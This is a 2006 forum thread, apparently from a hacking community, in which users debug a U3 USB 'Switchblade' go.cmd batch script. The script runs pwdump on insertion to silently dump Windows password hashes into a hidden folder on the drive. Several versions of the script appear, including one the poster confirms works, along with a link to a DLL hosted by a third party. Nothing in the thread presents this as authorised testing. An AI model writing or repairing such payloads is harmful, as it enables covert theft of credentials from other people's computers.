Difficulties with go.cmd and pwdump

Snacks · November 14, 2006

Hi I'm pretty new to the forums and to U3 shenanigans so apologies if this is an overly obvious question.

Basically I want my Switchblade to just grab the LM hashes from the computer using pwdump. I've been using the examples in the Switchblade packages page on the wiki, but without success.

Oh and I believe I have flashed the drive correctly using MaxDamage's Technique, as other payloads worked.

I was hoping someone could point me in the direction of the correct code for the go.cmd, and any other files I will need to grab the hashes.

Thanks for your time.

renegadecanuck · November 14, 2006

Hey, Snascks, could you be more specific please? Such as, what error messages are you getting, what is the current coding structure of your go.cmd, which payload are you using, etc.

Snacks · November 14, 2006

Sorry, here is a rundown of what I'm using;

U3 Sandisk Cruzer micro
Max Damage Technique
brainkills encrypted pwdump

Here is what I have for my go.cmd;

@echo off

if not exist WIPdump md WIPdump &gt;nul

if not exist WIPdump%computername% md WIPdump%computername% &gt;nul

cd WIPCMD &gt;nul



Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ***********[Dump SAM]*************** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .pwdump 127.0.0.1 &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Jester · November 14, 2006

I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was.

There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file

http://binaryninja.net/LsaExt.dll

Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8)

renegadecanuck · November 14, 2006

While, it will be detectable to AV's, try using the newest version on PWDump.

Snacks · November 14, 2006

Thanks for the replies,

I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was.
There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file

http://binaryninja.net/LsaExt.dll

Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8)

I tried the .dll and had the same problem as before, basically when i insert the drive all that seems to happen is the WIPdumpcomputername folder is made but there are no files in it.

While, it will be detectable to AV's, try using the newest version on PWDump.

I tried that and got the same problem.

renegadecanuck · November 14, 2006

Change

if not exist WIPdump%computername% md WIPdump%computername% >nul
cd WIPCMD >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

.pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1

to

if not exist WIPdump%computername.log% md WIPdump%computername%.log >nul
cd WIPCMD >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

.pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1

Snacks · November 14, 2006

Thankyou, I didnt have any luck even after all your help, not sure what the problem was, but i decided to start from scratch and made my own simplified version of 'go.cmd'.

For anyone interested i just used the following lines;

@echo off

pwdump -o %computername%.txt 127.0.0.1

That just dumps the passwords in CMD.

Jester · November 15, 2006

@echo off

if not exist WIPdump md WIPdump &gt;nul

if not exist WIPdump%computername% md WIPdump%computername% &gt;nul

cd WIPCMD &gt;nul 



Echo ************************************ &gt;&gt; WIPdump%computername%.log 2&gt;&amp;1

echo ***********[Dump SAM]*************** &gt;&gt; WIPdump%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; WIPdump%computername%.log 2&gt;&amp;1

   .pwdump 127.0.0.1 &gt;&gt; WIPdump%computername%.log 2&gt;&amp;1

Here is the correct code you need to have you had the output going into the wrong directory.

Snacks · November 15, 2006

:oops: Thanks Jester! Working perfectly now. :D

Jester · November 15, 2006

Great to hear 8) 8) 8)

mubix · November 15, 2006

Where can one find updated code at.. I am probably buying a U3 device tonight

Jester · November 15, 2006

You can check out the wiki

http://www.hak5.org/wiki/Switchblade_Packages

Sign In

Difficulties with go.cmd and pwdump

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation

Recently Browsing 0 members